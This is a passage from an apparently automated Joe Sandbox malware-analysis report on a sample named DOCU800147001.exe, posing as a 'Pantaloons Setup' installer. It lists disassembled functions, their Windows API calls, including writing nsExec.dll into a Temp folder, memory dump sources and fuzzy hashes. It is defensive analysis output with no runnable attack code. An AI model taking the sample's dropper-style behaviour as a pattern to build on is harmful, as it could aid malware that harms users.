                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: e99dd21401efed87dc49a6cbbfa93a04913e4a180baa6c9a590e864f9320e764
                                                • Instruction ID: 4b9cb6e92412fb6e6e80457b7b9377e947a39d5b648e27d3fa4f73b4a66c0764
                                                • Opcode Fuzzy Hash: e99dd21401efed87dc49a6cbbfa93a04913e4a180baa6c9a590e864f9320e764
                                                • Instruction Fuzzy Hash: E321A171A04208AEEF05AFB4CD4AAAE7AB5AB40304F10457AF541B61D1D6B889409718
                                                Function 004038C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowTextA.USER32(00000000,Pantaloons Setup), ref: 00403960
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: "C:\Users\user\Desktop\DOCU800147001.exe"$1033$Pantaloons Setup
                                                • API String ID: 530164218-4027206549
                                                • Opcode ID: 4175e075b01ad65f8282afdac58c2cd915722d9bffd7f40478f4155676e6cd52
                                                • Instruction ID: 7f85c913c4ad4b2c7e28f7c5eb066f69db857395fa0ea2f0da5054c576734154
                                                • Opcode Fuzzy Hash: 4175e075b01ad65f8282afdac58c2cd915722d9bffd7f40478f4155676e6cd52
                                                • Instruction Fuzzy Hash: 461104B5B006109FD320AF15DC809373BACEBC6356728827BE801A73E0C77DAD028B58
                                                Function 0040560A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405610
                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030B5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,0040327D), ref: 00405619
                                                • lstrcatA.KERNEL32(?,00409014), ref: 0040562A
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040560A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-3936084776
                                                • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                • Instruction ID: f0a200e34b5deac35b36b8c3e513a2bba311d5b4005e9f4ea20cd842f48867ab
                                                • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                                • Instruction Fuzzy Hash: 16D0A962605D302AD2022615AC0AE8B7A68CF06305B040422F200B62A3C63C2D418BFE
                                                Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                  • Part of subcall function 00405AD8: wsprintfA.USER32 ref: 00405AE5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 1404258612-0
                                                • Opcode ID: 57426068bb78e7fc12ff25959f7bd679cb8cd8833ff19df23162cb9bd9f4a020
                                                • Instruction ID: cf871c65d4e4f3ee9653570a57c4ed279446943cd2c239248b6b376061a1ea1e
                                                • Opcode Fuzzy Hash: 57426068bb78e7fc12ff25959f7bd679cb8cd8833ff19df23162cb9bd9f4a020
                                                • Instruction Fuzzy Hash: 3F115AB2900108BEDB01AFA5D881DEEBBB9EF04344F10807AF505F21A1E7789A54DB28
                                                Function 004056A3 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,0040570F,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,?,76233410,0040545A,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004056B1
                                                • CharNextA.USER32(00000000), ref: 004056B6
                                                • CharNextA.USER32(00000000), ref: 004056CA
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsx7F0.tmp, xrefs: 004056A4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp
                                                • API String ID: 3213498283-2526228488
                                                • Opcode ID: b743ab26e54571032f58e362f9be0a160f4e35464d45215ae3ba9b7d85bee3d6
                                                • Instruction ID: a5f0db424de3ece2f93da8fa8465ac66cd1a9633bcd5b70ea5e8f5e09e52a010
                                                • Opcode Fuzzy Hash: b743ab26e54571032f58e362f9be0a160f4e35464d45215ae3ba9b7d85bee3d6
                                                • Instruction Fuzzy Hash: 04F0C251D04F602BFB3256240C54B775FACCB55360F980867E648662D2C6BE4C419FAA
                                                Function 00402BC7 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00402DA7,00000001), ref: 00402BDA
                                                • GetTickCount.KERNEL32 ref: 00402BF8
                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C15
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: edb15b2a557076f8163c7a3e93653ceb388576ec72b14a846b112ddb74d149d0
                                                • Instruction ID: 21b079e0603347407b0e8bea5ce89a635a222a91f4c3b4b14634b7546a67a8fd
                                                • Opcode Fuzzy Hash: edb15b2a557076f8163c7a3e93653ceb388576ec72b14a846b112ddb74d149d0
                                                • Instruction Fuzzy Hash: 7BF03A3080A620BFC6526F24BE4DA8F7B64EB05B52B504866F104B51A4D778A8828BEC
                                                Function 00404DD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404E08
                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404E59
                                                  • Part of subcall function 00403EB4: SendMessageA.USER32(00010438,00000000,00000000,00000000), ref: 00403EC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 5ed24ab9ef33d489e1b468578e452bb34f2c3a50ff0390caf4459e3fa9b2335e
                                                • Instruction ID: 160e060997078783acc2d08be4eebd9c773d2cb3c3e72dd3afa02660fee5d696
                                                • Opcode Fuzzy Hash: 5ed24ab9ef33d489e1b468578e452bb34f2c3a50ff0390caf4459e3fa9b2335e
                                                • Instruction Fuzzy Hash: 7E0171B1100248AFDF219F11DD84A9B3B2AFBC4715F104037FB04762E1C3399C5296AA
                                                Function 004056F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Pantaloons Setup,NSIS Error), ref: 00405B87
                                                  • Part of subcall function 004056A3: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,0040570F,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,?,76233410,0040545A,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 004056B1
                                                  • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056B6
                                                  • Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056CA
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,?,76233410,0040545A,?,C:\Users\user\AppData\Local\Temp\,76233410,00000000), ref: 0040574B
                                                • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp,?,?,76233410,0040545A,?,C:\Users\user\AppData\Local\Temp\,76233410), ref: 0040575B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp
                                                • API String ID: 3248276644-2526228488
                                                • Opcode ID: 62525b7c2a38e913442d275aa1c28f230d0f9bde0bdea29c2ebf83fee8925d4c
                                                • Instruction ID: 37b6e5ee433a41c3c1a3ade2b68dfeb55dd06932413cee03f53a9676b214a67c
                                                • Opcode Fuzzy Hash: 62525b7c2a38e913442d275aa1c28f230d0f9bde0bdea29c2ebf83fee8925d4c
                                                • Instruction Fuzzy Hash: 5DF0AF25119D54A6C726333A1C49B9F1A55CEC3368F58053BF8A0B32D2DB3C8953ADAE
                                                Function 004024D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000011), ref: 004024F1
                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll,00000000,?,?,00000000,00000011), ref: 00402510
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll, xrefs: 004024DF, 00402504
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: FileWritelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll
                                                • API String ID: 427699356-1842013876
                                                • Opcode ID: a0b9e4d4cabd500ee80d3648955f45f2d4dada88b7408df0afccb6b96bf52134
                                                • Instruction ID: 99ee78c1eccbef78809478a7420901dcf2550f89e1355c3fa2d0585c42f5b742
                                                • Opcode Fuzzy Hash: a0b9e4d4cabd500ee80d3648955f45f2d4dada88b7408df0afccb6b96bf52134
                                                • Instruction Fuzzy Hash: E2F0E972A44244EFDB40EBB08E4A9EF3268DB01304F10443FB141F61C2D5FC4941A76E
                                                Function 0040356E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76233410,00403546,0040338A,?), ref: 00403588
                                                • GlobalFree.KERNEL32(00000000), ref: 0040358F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403580
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: Free$GlobalLibrary
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 1100898210-3936084776
                                                • Opcode ID: 3009e9edeeaf225471aa20a49794f7f9debd27987f3a1fde2fe5324fb2cef97b
                                                • Instruction ID: c435f3d6a1630fa5b517ded6fe9ed7dc0ebc24c208808f32919fc3bc69cf13a8
                                                • Opcode Fuzzy Hash: 3009e9edeeaf225471aa20a49794f7f9debd27987f3a1fde2fe5324fb2cef97b
                                                • Instruction Fuzzy Hash: EBE08C32844120ABC6216FA4EC0871AB7686B58B22F06842BEC017B2B0837C2D424B98
                                                Function 00405651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C97,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DOCU800147001.exe,C:\Users\user\Desktop\DOCU800147001.exe,80000000,00000003), ref: 00405657
                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C97,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DOCU800147001.exe,C:\Users\user\Desktop\DOCU800147001.exe,80000000,00000003), ref: 00405665
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2169614295.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2169596206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169633961.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2169657157.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2170287531.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_DOCU800147001.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3125694417
                                                • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                • Instruction ID: 7d1453c19011f5abfc5d5d617c6b663c4d95b5fcfd1fb09af13cacd58312ca43
                                                • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                                • Instruction Fuzzy Hash: 78D0A762409D702EE30363109C04B8F7A58CF12300F4904A2E080E6195C6791D414BAD
                                                Function 00405770 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 00405780
                                                • lstrcmpiA.KERNEL32(0040599F,00000000), ref: 00405798
                                                • CharNextA.USER32(0040599F,?,00000000,0040599F,00000000,[Rename],00000000,00000000,00000000), ref: 004057A9
